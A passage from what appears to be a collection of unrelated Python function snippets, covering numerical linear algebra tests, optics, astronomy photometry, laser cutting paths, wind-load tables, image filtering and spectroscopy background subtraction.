35],\n [0, 24, 34, 44, 45],\n [0, 0, 35, 45, 55],\n ]\n )\n A_sym_band_u = np.array(\n [[0, 0, 13, 24, 35], [0, 12, 23, 34, 45], [11, 22, 33, 44, 55]]\n )\n A_sym_band_l = np.array(\n [[11, 22, 33, 44, 55], [12, 23, 34, 45, 0], [13, 24, 35, 0, 0]]\n )\n A = banded_to_full(A_sym_band_u, 5, kl=0, ku=2, mode='s')\n assert norm(A - A_sym) == 0\n A = banded_to_full(A_sym_band_l, 5, kl=2, ku=0, mode='s')\n assert norm(A - A_sym) == 0\n\n A_herm = np.array(\n [\n [11, 12j, 13j, 0, 0],\n [-12j, 22, 23j, 24j, 0],\n [-13j, -23j, 33, 34j, 35j],\n [0, -24j, -34j, 44, 45j],\n [0, 0, -35j, -45j, 55],\n ]\n )\n A_herm_band_u = np.array(\n [[0, 0, 13j, 24j, 35j], [0, 12j, 23j, 34j, 45j], [11, 22, 33, 44, 55]]\n )\n A_herm_band_l = np.array(\n [\n [11, 22, 33, 44, 55],\n [-12j, -23j, -34j, -45j, 0],\n [-13j, -24j, -35j, 0, 0],\n ]\n )\n A = banded_to_full(A_herm_band_u, 5, kl=0, ku=2, mode='h')\n assert norm(A - A_herm) < 1e-14\n A = banded_to_full(A_herm_band_l, 5, kl=2, ku=0, mode='h')\n assert norm(A - A_herm) < 1e-14\n\n A_triu = np.array(\n [\n [11, 12, 13, 0, 0],\n [0, 22, 23, 24, 0],\n [0, 0, 33, 34, 35],\n [0, 0, 0, 44, 45],\n [0, 0, 0, 0, 55],\n ]\n )\n A_triu_band = A_sym_band_u\n A = banded_to_full(A_triu_band, 5, kl=0, ku=2, mode='t')\n assert norm(A - A_triu) == 0\n A = banded_to_full(A_triu_band, 5, kl=0, ku=2, mode='g')\n assert norm(A - A_triu) == 0\n\n A_tril = np.array(\n [\n [11, 0, 0, 0, 0],\n [12, 22, 0, 0, 0],\n [13, 23, 33, 0, 0],\n [0, 24, 34, 44, 0],\n [0, 0, 35, 45, 55],\n ]\n )\n A_tril_band = A_sym_band_l\n A = banded_to_full(A_tril_band, 5, kl=2, ku=0, mode='t')\n assert norm(A - A_tril) == 0\n A = banded_to_full(A_tril_band, 5, kl=2, ku=0, mode='g')\n assert norm(A - A_tril) == 0", "def expand_slicer_aperture(system):\n\n # First of all, we need to find the Surface Number for the IMAGE SLICER\n N_surfaces = system.LDE.NumberOfSurfaces\n surface_names = {} # A dictionary of surface number -> surface comment\n for k in np.arange(1, N_surfaces):\n surface_names[k] = system.LDE.GetSurfaceAt(k).Comment\n # find the Slicer surface number\n try:\n # The naming convention for this surface has changed. Not the same for Nominal Design as Monte Carlos\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('Slicer Mirror')]\n except ValueError:\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('IFU ISA')]\n slicer = system.LDE.GetSurfaceAt(slicer_num)\n\n # Read Current Aperture Settings\n apt_type = slicer.ApertureData.CurrentType\n # print(\"Aperture type: \", apt_type)\n if apt_type == 4: # 4 is Rectangular aperture\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # print(\"Current Settings:\")\n x0 = current_apt_sett._S_RectangularAperture.XHalfWidth\n y0 = current_apt_sett._S_RectangularAperture.YHalfWidth\n # If the Y aperture hasn't been changed already, we change it here to 999 mm to get all rays through\n if y0 != 999:\n # Change Settings\n aperture_settings = slicer.ApertureData.CreateApertureTypeSettings(\n constants.SurfaceApertureTypes_RectangularAperture)\n aperture_settings._S_RectangularAperture.XHalfWidth = x0\n aperture_settings._S_RectangularAperture.YHalfWidth = 999\n slicer.ApertureData.ChangeApertureTypeSettings(aperture_settings)\n\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # Notify that we have successfully modified the aperture\n print(\"Changing aperture of surface: \", slicer.Comment)\n print(\"New Settings:\")\n print(\"X_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.XHalfWidth)\n print(\"Y_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.YHalfWidth)\n\n return", "def reshape(self, bottom, top):\n\t\tpass", "def make_lightcurve(centroids, bands, band_idx, box_size, aperture_radius):\n band_names = np.sort(list(bands.keys()))\n num_stars= range(len(centroids))\n for star_idx in num_stars:\n xcenters, ycenters = [],[]\n aperture_sums = []\n background = []\n fwhms = []\n obs_time = []\n obs_mjd = []\n ##extract lightcurve (enumerate all frames) in a given band\n for i in tqdm(bands[band_names[band_idx]]):\n #import pdb; pdb.set_trace()\n hdr = fits.open(i)[0].header\n img = fits.open(i)[0].data\n #get dates from fits header\n date=dt.strptime(hdr['DATE-OBS'], '%Y-%m-%d')\n time=dt.strptime(hdr['EXP-STRT'], '%H:%M:%S.%f')\n newdate = time.replace(year=date.year, month=date.month, day=date.day)\n obs_time.append(newdate)\n obs_mjd.append(hdr['MJD-STRT'])\n\n #crop\n #import pdb; pdb.set_trace()\n image_crop = get_crop(img, centroids[star_idx], box_size)\n\n ###aperture photometry###\n #compute centroid\n centroid = get_centroid(image_crop)\n\n xcenters.append(centroid[0])\n ycenters.append(centroid[1])\n\n #compute backgound\n bkg_mean=get_bkg(image_crop, centroid, r_in=20., r_out=30.)\n\n #measure fwhm\n fwhm=get_fwhm(image_crop)\n\n #without aperture photometry\n\n aperture_sum = get_phot(image_crop, centroid, r=aperture_radius)\n\n #minus background wihtin annulus\n #aperture_sum = get_phot2(image_crop,bkg_mean,centroid,r=aperture_radius)\n\n aperture_sums.append(aperture_sum)\n background.append(bkg_mean)\n\n # if fwhm < 10*np.median(fwhms):\n # fwhms.append(fwhm)\n # else:\n # fwhms.append(np.nan)\n fwhms.append(fwhm)\n\n #output as dataframe of given band and star\n\n dfs.append(pd.DataFrame(\n {'{0}_{1}_x'.format(band_names[band_idx], str(star_idx)) : xcenters,\n '{0}_{1}_y'.format(band_names[band_idx], str(star_idx)) : ycenters,\n '{0}_{1}_flux_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : aperture_sums,\n '{0}_{1}_bkg_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : background,\n '{0}_{1}_fwhm_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : fwhms},\n #'airmass' : airmass\n index = obs_time))\n return dfs, band_idx, band_names", "def calculate_stretch(t, period, transit_times):\r\n\r\n duration_timeseries = (numpy.max(t) - numpy.min(t)) / period\r\n epochs = len(transit_times)\r\n stretch = duration_timeseries / epochs\r\n return stretch", "def oss_stacked(block, cut, laser):\r\n\tx0_1, x1_1, z0_1, taper_x_1, taper_y_1, layers_1, pyramid_angle_1 = oss_helper(block, cut, laser, cut[\"final_dimension_x\"]/2)\r\n\tx0_2, x1_2, z0_2, taper_x_2, taper_y_2, layers_2, pyramid_angle_2 = oss_helper(block, cut, laser, cut[\"final_dimension_y\"]/2)\r\n\tangle = math.radians(laser[\"kerf_angle\"]/2)\r\n\tgap = math.tan(pyramid_angle_1) * (cut[\"final_dimension_x\"]/2) + cut[\"gap_size\"]\r\n\tunit_length = gap + cut[\"base_height\"]\r\n\tmax_slices = math.floor(block[\"thickness\"]/unit_length)\r\n\ttaper_straight = math.tan(angle)*(laser[\"z_spacing\"])\r\n\r\n\tif cut[\"core\"] == \"yes\":\r\n\t\tcutlist = json.loads(vertical_core(block,cut,laser))\r\n\t\tcutlist.pop()\r\n\t\tcutlist.pop(0)\r\n\telse:\r\n\t\tcutlist = []\r\n\r\n\ta0 = -(90 + math.degrees(angle))\r\n\r\n\tz_shift = (cut[\"base_height\"] + gap) * math.sin(angle)\r\n\tx_shift = (cut[\"base_height\"] + gap) * math.cos(angle)\r\n\r\n\tx_delta = math.sin(angle) * block[\"origin_x\"]\r\n\ty_delta = math.sin(angle) * block[\"origin_y\"]\r\n\tz1_delta = math.cos(angle) * block[\"origin_x\"]\r\n\tz2_delta = math.cos(angle) * block[\"origin_y\"]\r\n\r\n\tcutlist.append([\"a_abs\",f\"{a0:.6f}\"])\r\n\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\r\n\r\n\tif pyramid_angle_1 >= angle and pyramid_angle_2 >= angle:\r\n\r\n\t\tif cut[\"num_of_seeds\"] == \"max\":\r\n\t\t\tnum_slices = max_slices\r\n\t\telse:\r\n\t\t\tnum_slices = cut[\"num_of_seeds\"] + 1\r\n\t\t\r\n\t\tfor i in range(num_slices):\r\n\t\t\tcutlist = (cutlist\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x0_1 + y_delta,-cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x1_1 + y_delta,z0_1 + block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 + z1_delta)]] + [[\"c_abs\",\"90\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x0_2 + x_delta,-cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x1_2 + x_delta,z0_2 + block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_1 - z2_delta)]] + [[\"c_abs\",\"180\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x0_1 - y_delta,-cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x1_1 - y_delta,z0_1 - block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 - z1_delta)]] + [[\"c_abs\",\"270\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x0_2 - x_delta,-cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x1_2 - x_delta,z0_2 - block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t )\r\n\t\t\tz0_1 = z0_1 + z_shift\r\n\t\t\tz0_2 = z0_2 + z_shift\r\n\t\t\tx0_1, x1_1, x0_2, x1_2 = x0_1 - x_shift, x1_1 - x_shift, x0_2 - x_shift, x1_2 - x_shift\r\n\t\t\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\t\t\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\t\r\n\telse:\r\n\t\traise Exception(\"Pyramid angle too small\")\r\n\r\n\tcutlist.insert(0, [\"set_trigger4\", \"1\", \"0\", \"7\", \"8\", \"45\"])\r\n\tcutlist.append([\"stop_trigger\"])\r\n\treturn json.dumps(cutlist)", "def terrain_multiplier(self):\n #Hardcode table of terrain multipliers\n self.terrain_table = pd.DataFrame({\n 'height': [0.00, 3.00, 5.00, 10.0, 15.0, 20.0, 30.0, 40.0, 50.0, 75.0, 100., 150., 200.],\n '1': [0.99, 0.99, 1.05, 1.12, 1.16, 1.19, 1.22, 1.24, 1.25, 1.27, 1.29, 1.31, 1.32],\n '2': [0.91, 0.91, 0.91, 1.00, 1.05, 1.08, 1.12, 1.16, 1.18, 1.22, 1.24, 1.27, 1.29],\n '3': [0.83, 0.83, 0.83, 0.83, 0.89, 0.94, 1.00, 1.04, 1.07, 1.12, 1.16, 1.21, 1.24],\n '4': [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.80, 0.85, 0.90, 0.98, 1.03, 1.11, 1.16]}) #T4.1 AS1170.2\n self.terrain_table.set_index('height',inplace=True)\n\n terrain_stacked = self.terrain_table.stack().reset_index().values\n\n #2d interpolation of Table 4.1 AS1170.2.\n #Terrain Categories may be halves (e.g Category 1.5)\n #Heights may be any value\n #https://stackoverflow.com/questions/56291133/interpolation-of-a-pandas-dataframe\n self.M_z_cat = griddata(terrain_stacked[:,0:2],\n terrain_stacked[:,2],\n [(self.height, self.terrain_category)],\n method='linear')[0]", "def gen_rhombus(width):\n for row in range(1, width +1, 2):\n yield f\"{(STAR * row).center(width)}\"\n\n for row in range(width -2, 0, -2):\n yield f\"{(STAR * row).center(width)}\"", "def arm(self):\n pass", "def recon_steer_bands(pyr, freq_resps, numlevels, numorientations):\n \n result_bands = np.zeros(pyr[0].shape)\n\n freq_hi = np.fft.fftshift(np.fft.fft2(pyr[0]))\n result_hi = np.fft.ifft2(np.fft.fftshift(np.multiply(freq_hi, np.conjugate(freq_resps[0])))).real \n \n freq_lo = np.fft.fftshift(np.fft.fft2(pyr[2]))\n result_lo = np.fft.ifft2(np.fft.fftshift(np.multiply(freq_lo, np.conjugate(freq_resps[2])))).real\n \n freq_resp_band = freq_resps[1]\n pyr_band = pyr[1] \n for i in range(numlevels):\n for j in range(numorientations): \n freq_band = np.fft.fftshift(np.fft.fft2(pyr_band[i][j]))\n result_band = np.fft.ifft2(np.fft.fftshift(np.multiply(freq_band, np.conjugate(freq_resp_band[i][j])))).real\n result_bands = result_bands + result_band \n result = result_bands + result_hi + result_lo\n return result", "def logistic(scale, shift, stretch, t):\r\n return scale / (1 + np.power(np.e, -1.0*(t - shift )/ stretch))", "def tridiag_matrix(bc_surface_type, upsilon, space_divisions, dx, k, T, h, hc, emissivity, sigma):\n # create tri-diagonal matrix\n A = np.diagflat([-upsilon for i in range(space_divisions - 1)], -1) +\\\n np.diagflat([1 + 2 * upsilon for i in range(space_divisions)]) +\\\n np.diagflat([-upsilon for i in range(space_divisions - 1)], 1)\n\n # adjust matrix depending on the boundary condition at the exposed surface\n if bc_surface_type == \"linear\":\n A[0,0] = 1 + 2*upsilon + 2*upsilon*dx*h/k\n A[0,1] = -2*upsilon\n \n elif bc_surface_type == \"non-linear\":\n A[0,0] = 1 + 2*upsilon + 2*dx*hc*upsilon/k+ 8*emissivity*sigma*dx*upsilon*T[0]**3/k\n A[0,1] = -2*upsilon\n \n # adjust matrix for the back boundary conditions\n A[-1, -2] = - 2 * upsilon\n A[-1, -1] = 1 + 2 * upsilon\n\n return A", "def prepare_r_uls_r_lus(\n number_of_levels,\n number_of_shells,\n j_blues,\n excitation_species,\n nlte_data,\n ):\n # number_of_levels = atomic_data_levels.energy.loc[\n # excitation_species\n # ].count() do this in the solver\n lnl = nlte_data.lines_level_number_lower[excitation_species]\n lnu = nlte_data.lines_level_number_upper[excitation_species]\n (lines_index,) = nlte_data.lines_idx[excitation_species]\n\n try:\n j_blues_filtered = j_blues.iloc[lines_index]\n except AttributeError:\n j_blues_filtered = j_blues\n A_uls = nlte_data.A_uls[excitation_species]\n B_uls = nlte_data.B_uls[excitation_species]\n B_lus = nlte_data.B_lus[excitation_species]\n r_lu_index = lnu * number_of_levels + lnl\n r_ul_index = lnl * number_of_levels + lnu\n r_ul_matrix = np.zeros(\n (number_of_levels, number_of_levels, number_of_shells),\n dtype=np.float64,\n )\n r_ul_matrix_reshaped = r_ul_matrix.reshape(\n (number_of_levels**2, number_of_shells)\n )\n r_ul_matrix_reshaped[r_ul_index] = (\n A_uls[np.newaxis].T + B_uls[np.newaxis].T * j_blues_filtered\n )\n r_lu_matrix = np.zeros_like(r_ul_matrix)\n r_lu_matrix_reshaped = r_lu_matrix.reshape(\n (number_of_levels**2, number_of_shells)\n )\n r_lu_matrix_reshaped[r_lu_index] = (\n B_lus[np.newaxis].T * j_blues_filtered\n )\n return (\n lines_index,\n r_ul_index,\n r_ul_matrix,\n r_lu_index,\n r_lu_matrix,\n )\n # TODO: beta sobolev needs to be recalculated for each iteration, because it depends on number density", "def swipeBase (self) :\n grid = self.grid\n\n #we start by putting every tile up\n for columnNbr in range(4) :\n nbrZeros = 4 - np.count_nonzero(grid[:,columnNbr])\n\n for lineNbr in range(4) :\n counter = 0\n while (grid[lineNbr, columnNbr] == 0) and (counter < 4):\n counter += 1\n if np.count_nonzero(grid[lineNbr:4, columnNbr]) != 0 :\n for remainingLine in range (lineNbr, 3) :\n grid[remainingLine, columnNbr] = grid[remainingLine+1, columnNbr]\n grid[3, columnNbr] = 0\n\n #now we do the additions\n for lineNbr in range(3) :\n if grid[lineNbr, columnNbr] == grid[lineNbr+1, columnNbr] :\n grid[lineNbr, columnNbr] *= 2\n for remainingLine in range (lineNbr+1, 3) :\n grid[remainingLine, columnNbr] = grid[remainingLine+1, columnNbr]\n grid[3, columnNbr] = 0\n\n return (grid)", "def defineSigmaLevels():\r\n # A and B values for the definition of sigma levelist\r\n # Since there are 72 model levels, there are 73 half levels, so it is for A and B values\r\n # the unit of A is hPa!!!!!!!!!!!!\r\n # from surface to TOA\r\n A = np.array([\r\n 0.000000e+00, 4.804826e-02, 6.593752e+00, 1.313480e+01, 1.961311e+01, 2.609201e+01,\r\n 3.257081e+01, 3.898201e+01, 4.533901e+01, 5.169611e+01, 5.805321e+01, 6.436264e+01,\r\n 7.062198e+01, 7.883422e+01, 8.909992e+01, 9.936521e+01, 1.091817e+02, 1.189586e+02,\r\n 1.286959e+02, 1.429100e+02, 1.562600e+02, 1.696090e+02, 1.816190e+02, 1.930970e+02,\r\n 2.032590e+02, 2.121500e+02, 2.187760e+02, 2.238980e+02, 2.243630e+02, 2.168650e+02,\r\n 2.011920e+02, 1.769300e+02, 1.503930e+02, 1.278370e+02, 1.086630e+02, 9.236572e+01,\r\n 7.851231e+01, 6.660341e+01, 5.638791e+01, 4.764391e+01, 4.017541e+01, 3.381001e+01,\r\n 2.836781e+01, 2.373041e+01, 1.979160e+01, 1.645710e+01, 1.364340e+01, 1.127690e+01,\r\n 9.292942e+00, 7.619842e+00, 6.216801e+00, 5.046801e+00, 4.076571e+00, 3.276431e+00,\r\n 2.620211e+00, 2.084970e+00, 1.650790e+00, 1.300510e+00, 1.019440e+00, 7.951341e-01,\r\n 6.167791e-01, 4.758061e-01, 3.650411e-01, 2.785261e-01, 2.113490e-01, 1.594950e-01,\r\n 1.197030e-01, 8.934502e-02, 6.600001e-02, 4.758501e-02, 3.270000e-02, 2.000000e-02,\r\n 1.000000e-02,],dtype=float)\r\n # reverse A\r\n A = A[::-1] * 100 # change unit to Pa\r\n # the unit of B is 1!!!!!!!!!!!!\r\n # from surfac eto TOA\r\n B = np.array([\r\n 1.000000e+00, 9.849520e-01, 9.634060e-01, 9.418650e-01, 9.203870e-01, 8.989080e-01,\r\n 8.774290e-01, 8.560180e-01, 8.346609e-01, 8.133039e-01, 7.919469e-01, 7.706375e-01,\r\n 7.493782e-01, 7.211660e-01, 6.858999e-01, 6.506349e-01, 6.158184e-01, 5.810415e-01,\r\n 5.463042e-01, 4.945902e-01, 4.437402e-01, 3.928911e-01, 3.433811e-01, 2.944031e-01,\r\n 2.467411e-01, 2.003501e-01, 1.562241e-01, 1.136021e-01, 6.372006e-02, 2.801004e-02,\r\n 6.960025e-03, 8.175413e-09, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00,],dtype=float)\r\n # reverse B\r\n B = B[::-1]\r\n\r\n return (A, B)", "def expanded_boundaries(self):\n width = self._points[0][3][0] - self._points[0][1][0]\n height = self._points[0][3][1] - self._points[0][1][1]\n factor = np.multiply((width, height), Window.BORDER)\n return (\n np.subtract(self._points[0][1], factor),\n np.add(self._points[0][3], factor))", "def setup_layout_constants(self):\n # determines the spacing between the edge and nmos (rail to active\n # metal or poly_to_poly spacing)\n half_gate_to_gate = 0.5 * (drc[\"poly_to_poly\"] - drc[\"minwidth_metal1\"])\n edge_to_nmos = max(drc[\"metal1_to_metal1\"] - self.nmos.active_contact_positions[0].y,\n half_gate_to_gate - self.nmos.poly_positions[0].y)\n\n # determine the position of the first transistor from the left\n self.nmos_position1 = vector(0,\n 0.5 * drc[\"minwidth_metal1\"] + edge_to_nmos)\n offset = self.nmos_position1 + vector(0,self.nmos.height)\n\n x = vector(self.nmos.active_width - self.nmos.active_contact.width, 0)\n self.nmos_position2 = x + self.nmos_position1.scale(0,1)\n\n # determines the spacing between the edge and pmos\n edge_to_pmos = max(drc[\"metal1_to_metal1\"] - self.pmos.active_contact_positions[0].y,\n half_gate_to_gate - self.pmos.poly_positions[0].y)\n self.pmos_position1 = vector(0,\n self.height - 0.5 * drc[\"minwidth_metal1\"]\n - edge_to_pmos - self.pmos.height)\n self.pmos_position2 = self.pmos_position1 + vector(self.pmos.width,0)\n\n self.well_width = max(self.pmos_position2.x + self.pmos.active_position.x\n + self.pmos.active_width\n + drc[\"active_to_body_active\"] + self.nwell_contact.width \n + drc[\"well_enclosure_active\"],\n self.nmos_position2.x + self.nmos.active_position.x \n + self.nmos.active_width \n + drc[\"active_to_body_active\"] + drc[\"well_enclosure_active\"])\n self.width = self.well_width", "def warm_region_cal(audio_samples, fs):\n #window the audio\n windowed_samples = timbral_util.window_audio(audio_samples)\n\n # need to define a function for the roughness stimuli, emphasising the 20 - 40 region (of the bark scale)\n min_bark_band = 10\n max_bark_band = 40\n mean_bark_band = (min_bark_band + max_bark_band) / 2.0\n array = np.arange(min_bark_band, max_bark_band)\n x = timbral_util.normal_dist(array, theta=0.01, mean=mean_bark_band)\n x -= np.min(x)\n x /= np.max(x)\n\n wr_array = np.zeros(240)\n wr_array[min_bark_band:max_bark_band] = x\n\n # need to define a second array emphasising the 20 - 40 region (of the bark scale)\n min_bark_band = 80\n max_bark_band = 240\n mean_bark_band = (min_bark_band + max_bark_band) / 2.0\n array = np.arange(min_bark_band, max_bark_band)\n x = timbral_util.normal_dist(array, theta=0.01, mean=mean_bark_band)\n x -= np.min(x)\n x /= np.max(x)\n\n hf_array = np.zeros(240)\n hf_array[min_bark_band:max_bark_band] = x\n\n windowed_loud_spec = []\n windowed_rms = []\n\n wr_vals = []\n hf_vals = []\n\n for i in range(windowed_samples.shape[0]):\n samples = windowed_samples[i, :]\n N_entire, N_single = timbral_util.specific_loudness(samples, Pref=100.0, fs=fs, Mod=0)\n\n # append the loudness spec\n windowed_loud_spec.append(N_single)\n windowed_rms.append(np.sqrt(np.mean(samples * samples)))\n\n wr_vals.append(np.sum(wr_array * N_single))\n hf_vals.append(np.sum(hf_array * N_single))\n\n mean_wr = np.mean(wr_vals)\n mean_hf = np.mean(hf_vals)\n weighted_wr = np.average(wr_vals, weights=windowed_rms)\n weighted_hf = np.average(hf_vals, weights=windowed_rms)\n\n return mean_wr, weighted_wr, mean_hf, weighted_hf", "def stretch(self, x_stretch=1, y_stretch=1):\n self.width *= x_stretch\n self.height *= y_stretch\n\n # Always update the corners after operation\n self.update_corners()\n return", "def boundary_cond_dirichtlet(matriz,Tx1,Tx2,Ty1,Ty2):\n matriz[-1,:] = Tx2\n matriz[:,0] = Ty1\n matriz[:,-1] = Ty2\n matriz[0,:] = Tx1\n return matriz", "def post_heatdiag(self,ds):\n #\n self.drmid=self.rmid*0 # mem allocation\n self.drmid[1:-1]=(self.rmid[2:]-self.rmid[0:-2])*0.5\n self.drmid[0]=self.drmid[1]\n self.drmid[-1]=self.drmid[-2]\n\n dt = np.zeros_like(self.time)\n dt[1:] = self.time[1:] - self.time[0:-1]\n dt[0] = dt[1]\n rst=np.nonzero(dt<0) #index when restat happen\n dt[rst]=dt[rst[0]+1]\n self.dt = dt\n\n #get separatrix r\n self.rs=np.interp([1],self.psin,self.rmid)\n \n self.rmidsepmm=(self.rmid-self.rs)*1E3 # dist from sep in mm\n\n #get heat\n self.qe=np.transpose(self.e_perp_energy_psi + self.e_para_energy_psi)/dt/ds\n self.qi=np.transpose(self.i_perp_energy_psi + self.i_para_energy_psi)/dt/ds\n self.ge=np.transpose(self.e_number_psi)/dt/ds\n self.gi=np.transpose(self.i_number_psi)/dt/ds\n\n self.qe = np.transpose(self.qe)\n self.qi = np.transpose(self.qi)\n self.ge = np.transpose(self.ge)\n self.gi = np.transpose(self.gi)\n\n self.qt=self.qe+self.qi\n #imx=self.qt.argmax(axis=1)\n mx=np.amax(self.qt,axis=1)\n self.lq_int=mx*0 #mem allocation\n\n for i in range(mx.shape[0]):\n self.lq_int[i]=np.sum(self.qt[i,:]*self.drmid)/mx[i]", "def flattener(image, pts, w, h):\n temp_rect = np.zeros((4,2), dtype = \"float32\")\n \n s = np.sum(pts, axis = 2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis = -1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n if w > 0.8 * h and w < 1.2 * h: #If card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n \n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [MAXWIDTH - 1, 0], [MAXWIDTH - 1, MAXHEIGHT - 1], [0, MAXHEIGHT - 1]], np.float32)\n M = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, M, (MAXWIDTH, MAXHEIGHT))\n\n return warp", "def build_steer_bands(im, freq_resps, numlevels, numorientations):\n \n dims = im.shape\n bands = []\n pyr = []\n fourier = np.fft.fftshift(np.fft.fft2(im))\n \n freq_resp_hi = freq_resps[0] \n hi = np.fft.ifft2(np.fft.fftshift(np.multiply(fourier, freq_resp_hi))).real\n \n freq_resp_lo = freq_resps[2] \n lo = np.fft.ifft2(np.fft.fftshift(np.multiply(fourier, freq_resp_lo))).real\n \n freq_resp_bands = freq_resps[1] \n for i in range(numlevels):\n for j in range(numorientations):\n freq_respband = freq_resp_bands[i][j]\n ifourier_band = np.fft.ifft2(np.fft.fftshift(np.multiply(fourier, freq_respband))).real\n bands.append(ifourier_band)\n bands = np.reshape(bands, [numlevels, numorientations, dims[0], dims[1]])\n \n pyr.append(hi)\n pyr.append(bands)\n pyr.append(lo)\n return pyr", "def subtract_linear_bg(region, y_data='final', manual_bg=None, by_min=False, add_column=True, overwrite=True):\n\n def calculate_line(min_position):\n \"\"\"Helper function to calculate the line cross the whole\n spectrum given coordinates of two points and \"left\" or \"right\" value\n of min_position to know in which direction the line must be extended\n \"\"\"\n # School algebra to calculate the line coordinates given two points\n if min_position == \"right\": # Line from left end to min\n x1 = energy[0]\n x2 = energy[counts_min_index]\n y1 = counts[0]\n y2 = counts_min\n slope = (y1 - y2) / (x1 - x2)\n b = (x1 * y1 - x2 * y1) / (x1 - x2)\n line_end = slope * energy[-1] + b\n return np.linspace(counts[0], line_end, len(energy))\n elif min_position == \"left\":\n x1 = energy[counts_min_index]\n x2 = energy[-1]\n y1 = counts_min\n y2 = counts[-1]\n slope = (y1 - y2) / (x1 - x2)\n b = (x1 * y1 - x2 * y1) / (x1 - x2)\n line_end = slope * energy[0] + b\n return np.linspace(line_end, counts[-1], len(energy))\n\n def calculate_manual_bg(x, y, x_intervals):\n left_interval = x_intervals[0]\n right_interval = x_intervals[1]\n # Checking that left is left and right is right. Swop otherwise.\n if x[0] > x[-1]:\n if left_interval[0] < right_interval[0]:\n left_interval = x_intervals[1]\n right_interval = x_intervals[0]\n\n left_bg_values = []\n right_bg_values = []\n\n first_left_index = 0\n last_left_index = len(x) - 1\n first_right_index = 0\n last_right_index = len(x) - 1\n for i in range(1, len(x)):\n if (x[i - 1] >= left_interval[0] >= x[i]) or (x[i - 1] <= left_interval[0] <= x[i]):\n first_left_index = i\n if (x[i - 1] >= left_interval[1] >= x[i]) or (x[i - 1] <= left_interval[1] <= x[i]):\n last_left_index = i\n if (x[i - 1] >= right_interval[0] >= x[i]) or (x[i - 1] <= right_interval[0] <= x[i]):\n first_right_index = i\n if (x[i - 1] >= right_interval[1] >= x[i]) or (x[i - 1] <= right_interval[1] <= x[i]):\n last_right_index = i\n\n left_background = y[first_left_index:last_left_index + 1]\n left_average = np.mean(left_background)\n # sum(left_background)/float(len(left_background))\n right_background = y[first_right_index:last_right_index + 1]\n right_average = np.mean(right_background)\n # sum(right_background)/float(len(right_background))\n\n return [left_average, right_average]\n\n counts = region.get_data(column=y_data).tolist()\n energy = 